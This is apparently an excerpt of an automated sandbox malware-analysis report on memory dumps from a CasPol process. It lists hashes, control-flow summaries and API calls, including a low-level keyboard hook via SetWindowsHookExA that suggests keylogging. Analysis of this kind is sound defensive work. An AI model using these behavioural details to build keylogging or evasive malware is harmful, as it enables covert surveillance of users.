                      • Opcode Fuzzy Hash: e71207823ee3bef0f8a9c8e9f20963b7d21d24f2f1b805c6dcddf13716f2c7dc
                      • Instruction Fuzzy Hash: 762127B1D102099FDB50DF9AD944BEEBBF5FB88320F10842AE415A7250C774AA44CFA5
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Control-flow Graph

                      Strings
                      Memory Dump Source
                      • Source File: 00000001.00000002.560956011.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_6f40000_CasPol.jbxd
                      Similarity
                      • API ID:
                      • String ID: o
                      • API String ID: 0-252678980
                      • Opcode ID: fc534fee3a81568c65685e62c0ece3b08622c41838dd6492c13ba742ee0984cd
                      • Instruction ID: 606660e12b0b9767a9d79af1cc6c532eed785754c1d5fecef4c8ac10a34ff34d
                      • Opcode Fuzzy Hash: fc534fee3a81568c65685e62c0ece3b08622c41838dd6492c13ba742ee0984cd
                      • Instruction Fuzzy Hash: 0A41E372E043598FCB00DFA9D8146EEBFF1BF89310F1486AAD415AB650DB749885CBA1
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 24 6b92208-6b9225a 27 6b9225c-6b92264 24->27 28 6b92266-6b92298 SetWindowsHookExA 24->28 27->28 29 6b9229a-6b922a0 28->29 30 6b922a1-6b922c1 28->30 29->30
                      APIs
                      • SetWindowsHookExA.USER32(0000000D,00000000,?,?,?,?,?,?,?,?,?,06B92078,00000000,00000000), ref: 06B9228B
                      Strings
                      Memory Dump Source
                      • Source File: 00000001.00000002.560729192.0000000006B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B90000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_6b90000_CasPol.jbxd
                      Similarity
                      • API ID: HookWindows
                      • String ID: o
                      • API String ID: 2559412058-252678980
                      • Opcode ID: fd9326d882c45ba2da09ec3359a56f4eb902a0d9bf55519f18dd22e0c9c4e8d8
                      • Instruction ID: ce7bc6178347cdb2531bc039bf5a3a48d29eb070eb062656094e556012c81a00
                      • Opcode Fuzzy Hash: fd9326d882c45ba2da09ec3359a56f4eb902a0d9bf55519f18dd22e0c9c4e8d8
                      • Instruction Fuzzy Hash: FF2135B1D102099FCB54CFAAC844BEEBBF5FB88720F10842AE415A7250C774AA44CFA1
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 44 6b9b399-6b9b3e0 46 6b9b3e8-6b9b417 LoadLibraryExW 44->46 47 6b9b3e2-6b9b3e5 44->47 48 6b9b419-6b9b41f 46->48 49 6b9b420-6b9b43d 46->49 47->46 48->49
                      APIs
                      • LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,?,?,00000000,?,06B9B291,00000800), ref: 06B9B40A
                      Strings
                      Memory Dump Source
                      • Source File: 00000001.00000002.560729192.0000000006B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B90000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_6b90000_CasPol.jbxd
                      Similarity
                      • API ID: LibraryLoad
                      • String ID: o
                      • API String ID: 1029625771-252678980
                      • Opcode ID: 363df8b5116a4e1bc41b9f6651c77c100194f27a5aa474097c00c6f95e13996d
                      • Instruction ID: ddeb505162f05590e3c8e24cf49f91f848b91909287ed3a27de8a2bd5445e1e7
                      • Opcode Fuzzy Hash: 363df8b5116a4e1bc41b9f6651c77c100194f27a5aa474097c00c6f95e13996d
                      • Instruction Fuzzy Hash: 6C2103B6D003498FDB10CFAAD844ADEFBF4EB88720F14846EE455A7600C374A585CFA5
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 60 6f4cd4c-6f4e594 GlobalMemoryStatusEx 63 6f4e596-6f4e59c 60->63 64 6f4e59d-6f4e5c5 60->64 63->64
                      APIs
                      • GlobalMemoryStatusEx.KERNEL32(?,?,?,?,?,?,?,?,?,06F4E49A), ref: 06F4E587
                      Strings
                      Memory Dump Source
                      • Source File: 00000001.00000002.560956011.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_6f40000_CasPol.jbxd
                      Similarity
                      • API ID: GlobalMemoryStatus
                      • String ID: o
                      • API String ID: 1890195054-252678980
                      • Opcode ID: fc69c2219ce27791ff4991e28a8273b9007bd2fb0e97d805bf1430df75cffcff
                      • Instruction ID: 8ca028fb28b1219bbd31dfff425aed38e283e41101b6806d1360e99e444049af
                      • Opcode Fuzzy Hash: fc69c2219ce27791ff4991e28a8273b9007bd2fb0e97d805bf1430df75cffcff
                      • Instruction Fuzzy Hash: 8A11F2B1D006199BCB10DF9AD8447DEBBF4FB48720F14856AD418B7640D378AA54CFE5
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 52 6b99f54-6b9b3e0 54 6b9b3e8-6b9b417 LoadLibraryExW 52->54 55 6b9b3e2-6b9b3e5 52->55 56 6b9b419-6b9b41f 54->56 57 6b9b420-6b9b43d 54->57 55->54 56->57
                      APIs
                      • LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,?,?,00000000,?,06B9B291,00000800), ref: 06B9B40A
                      Strings
                      Memory Dump Source
                      • Source File: 00000001.00000002.560729192.0000000006B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B90000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_6b90000_CasPol.jbxd
                      Similarity
                      • API ID: LibraryLoad
                      • String ID: o
                      • API String ID: 1029625771-252678980
                      • Opcode ID: 299b088522cfb1f368a3deaaec39544e3d2ab280bed7dfcc44c792cd522f2d01
                      • Instruction ID: 95c2a8f84fce7624e9fd88df3d2e0c15e0f805fa667dab391bb37138c6406b77
                      • Opcode Fuzzy Hash: 299b088522cfb1f368a3deaaec39544e3d2ab280bed7dfcc44c792cd522f2d01
                      • Instruction Fuzzy Hash: 6911E4B6D043099FDB10CFAAD884ADEFBF4EB88720F14856AE415A7700C375A545CFA5
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 293 6b922ca-6b922d1 294 6b92289-6b92298 SetWindowsHookExA 293->294 295 6b922d3-6b9234c 293->295 296 6b9229a-6b922a0 294->296 297 6b922a1-6b922c1 294->297 296->297
                      APIs
                      • SetWindowsHookExA.USER32(0000000D,00000000,?,?,?,?,?,?,?,?,?,06B92078,00000000,00000000), ref: 06B9228B
                      Memory Dump Source
                      • Source File: 00000001.00000002.560729192.0000000006B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B90000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_6b90000_CasPol.jbxd
                      Similarity
                      • API ID: HookWindows
                      • String ID:
                      • API String ID: 2559412058-0
                      • Opcode ID: da7ba8bef8e741557746de60bfe2c2d3c48b7e08e3b23c11aa38a6f8939441a3
                      • Instruction ID: 6965bae76bf60c1250703e7ceadcaa6deaebe08e6a65c796cc183e599c5e2c8f
                      • Opcode Fuzzy Hash: da7ba8bef8e741557746de60bfe2c2d3c48b7e08e3b23c11aa38a6f8939441a3
                      • Instruction Fuzzy Hash: DF21D172A043409FC764DB6DD48069EBBF1EF91310B14896ED059DB250CB35A909CBA1
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 308 5a3ee21-5a3ee4b 309 5a3ee4d-5a3ee50 308->309 310 5a3ee73-5a3ee75 309->310 311 5a3ee52-5a3ee6e 309->311 312 5a3ee77 310->312 313 5a3ee7c-5a3ee7f 310->313 311->310 312->313 313->309 315 5a3ee81-5a3eeb3 313->315 322 5a3eeba-5a3eee8 315->322 327 5a3ef6a-5a3ef8e 322->327 328 5a3eeee-5a3eef8 322->328 336 5a3ef90 327->336 337 5a3ef98 327->337 332 5a3ef10-5a3ef68 328->332 333 5a3eefa-5a3ef00 328->333 332->327 332->328 334 5a3ef02 333->334 335 5a3ef04-5a3ef06 333->335 334->332 335->332 336->337
                      Strings
                      Memory Dump Source
                      • Source File: 00000001.00000002.560169503.0000000005A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A30000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_5a30000_CasPol.jbxd
                      Similarity
                      • API ID:
                      • String ID: P@Gp
                      • API String ID: 0-1978594688
                      • Opcode ID: b20be8e198cb1939327fd1e2d727f9ccaf70f2a52a23020f14975c7585987fb3
                      • Instruction ID: 9583bef97fd5c381b1bda16e2382e0a4eb00234295b84b69ca1a55e4c57b4e11
                      • Opcode Fuzzy Hash: b20be8e198cb1939327fd1e2d727f9ccaf70f2a52a23020f14975c7585987fb3
                      • Instruction Fuzzy Hash: AC41F5317002019FEB68AB789415A6E7AEBBFC8644F24482CF007DB390EF75DC058B95
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Memory Dump Source
                      • Source File: 00000001.00000002.560169503.0000000005A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A30000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_5a30000_CasPol.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: d6d03ad6f14b946bc4448bdda50babc608688d75f57581129628beaca5562e9b
                      • Instruction ID: 492ef4dd1697008b5a8bd67134eb3f7ed6bf6aa9dad0f73e6b47f4823fd2a7e4
                      • Opcode Fuzzy Hash: d6d03ad6f14b946bc4448bdda50babc608688d75f57581129628beaca5562e9b
                      • Instruction Fuzzy Hash: 7A317C70A102499BCB19CF65D455AAEF7B6FF89300F10C929E816EB350DB70AC46CB90
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Memory Dump Source
                      • Source File: 00000001.00000002.560169503.0000000005A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A30000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_5a30000_CasPol.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: c70d725a5b673404b28c934833e945c1bf36ce06567cfb598cf0b3739465a744
                      • Instruction ID: f08e00b310a63648c013af253845eeda64973387312d857fc7177d458f030a06
                      • Opcode Fuzzy Hash: c70d725a5b673404b28c934833e945c1bf36ce06567cfb598cf0b3739465a744
                      • Instruction Fuzzy Hash: 70315E70A00209DBCB19CF65D455AAEB7B6FF89304F10C519E816EB350DB70EC46CB90
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Memory Dump Source
                      • Source File: 00000001.00000002.560169503.0000000005A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A30000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_5a30000_CasPol.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: f6daf8cc77b90b5c386707657e91657c3fde1b41cd8316ec5880015c032a48df
                      • Instruction ID: c5abb8cffd1335d121dab0113708ce440775cb7a4c61abed645c9db0d2a8f941
                      • Opcode Fuzzy Hash: f6daf8cc77b90b5c386707657e91657c3fde1b41cd8316ec5880015c032a48df
                      • Instruction Fuzzy Hash: 2C217F71E1020A8FCB108BAED8419BEB7B6BFC5244F248076E92197244EB39D902CB91
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Memory Dump Source
                      • Source File: 00000001.00000002.560169503.0000000005A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A30000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_5a30000_CasPol.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 2684e3ce909d246693a2767d075a4646fdbdf2adf077fba857f1a0898dddf841
                      • Instruction ID: 6bab992514d6871fd551598527184fa0f3a3fade2ebc28ae4ae37e9a4ab8cef9
                      • Opcode Fuzzy Hash: 2684e3ce909d246693a2767d075a4646fdbdf2adf077fba857f1a0898dddf841
                      • Instruction Fuzzy Hash: F321A474E142068FCF25CFBAC4519BFBBB6BF85244F148066E911D7345EA79C902CB91
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Memory Dump Source
                      • Source File: 00000001.00000002.560169503.0000000005A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A30000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_5a30000_CasPol.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: b05d9dbf35daa7c75c75f8941681242b667664a005214e4f1886f6a760feffd5
                      • Instruction ID: 126d27df4bb5fcf135c8438e8682a7ac18822d8099c0069afecadecf4a5cba83
                      • Opcode Fuzzy Hash: b05d9dbf35daa7c75c75f8941681242b667664a005214e4f1886f6a760feffd5
                      • Instruction Fuzzy Hash: 84012C71F001299F8F54DFB9E8056EEBBF7BB98211F00452AD545E7304EB3486028BA5
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Memory Dump Source
                      • Source File: 00000001.00000002.560169503.0000000005A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A30000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_5a30000_CasPol.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 94ad8d301d7c4b89461a78d130dcd9e2c984592e730f89965a310d84f581731b
                      • Instruction ID: 983f10f39421c673def7f28182f950d5bce7933ccb869a334448707caea0cdb6
                      • Opcode Fuzzy Hash: 94ad8d301d7c4b89461a78d130dcd9e2c984592e730f89965a310d84f581731b
                      • Instruction Fuzzy Hash: D2E04F7184D3C0AFCB129BB49859D96BFB89F1214070980DFE8956B583D2286515C7A6
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Memory Dump Source
                      • Source File: 00000001.00000002.560169503.0000000005A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A30000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_5a30000_CasPol.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 5bb6d2ae8b674123a627264df53720587c41e273a5c38291756bd4cad7e70f0e
                      • Instruction ID: 3f5939fb8f83fe203aa56118c307e14220a4fc90e1514baf05349a16d5bc97e1
                      • Opcode Fuzzy Hash: 5bb6d2ae8b674123a627264df53720587c41e273a5c38291756bd4cad7e70f0e
                      • Instruction Fuzzy Hash: 40B09B71004248A786005695A5188657F9C5755501704C055F64547181C535E511D7A4
                      Uniqueness

                      Uniqueness Score: -1.00%